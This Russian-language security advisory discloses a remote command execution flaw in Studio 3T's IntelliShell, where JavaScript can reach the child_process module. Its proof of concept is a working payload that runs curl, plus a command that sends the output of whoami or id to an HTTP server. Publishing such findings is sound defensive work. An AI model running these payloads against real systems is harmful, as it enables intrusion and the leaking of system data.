
Studio 3T v.2025.1.0
Программное обеспечение: Studio 3T v.2025.1.0
Отчёт об уязвимости: Удалённое выполнение команд в Studio 3T
Обзор Критическая уязвимость в Studio 3T версии 2025.1.0 и более ранних позволяет удалённому злоумышленнику выполнять произвольный код с помощью специально созданной нагрузки, использующей модуль child_process в компоненте IntelliShell.
Детали Тип уязвимости: Удалённое выполнение команд Затронутый продукт: Studio 3T, версия <= 2025.1.0 Затронутый компонент: IntelliShell Тип атаки: Удалённая Воздействия: Выполнение кода: Да Отказ в обслуживании: Да Повышение привилегий: Да
Описание Уязвимость позволяет удалённому злоумышленнику выполнять произвольные команды операционной системы, отправляя вредоносную нагрузку JavaScript через IntelliShell, используя модуль child_process. Это уязвимость слепого выполнения, то есть прямой вывод злоумышленнику не возвращается.
Вектор атаки
Установите соединение с экземпляром MongoDB. Отправьте вредоносную нагрузку JavaScript через IntelliShell, использующую модуль child_process для выполнения произвольных команд операционной системы.
Доказательство концепции Для проверки уязвимости выполните следующие шаги:
Настройте локальный HTTP-сервер:
python3 -m http.server 80
Выполните следующую нагрузку JavaScript в IntelliShell:
const {exec} = require('child_process');
exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));
В качестве альтернативы используйте команду ниже как проверочный вектор:
curl http://site/$(id)
Ссылки
Официальный сайт Studio 3T
Репозиторий Studio 3T на GitHub
CWE-78: Внедрение команд ОС
CWE-94: Внедрение кода
Меры по смягчению Пользователи: Обновитесь до исправленной версии Studio 3T (если доступно) или избегайте использования IntelliShell с ненадёжными подключениями MongoDB. Разработчики: Ограничьте или очищайте входные данные для модуля child_process в IntelliShell для предотвращения несанкционированного выполнения команд.
Благодарности Эта уязвимость была обнаружена и сообщена Кайо Мендонса Перейрой.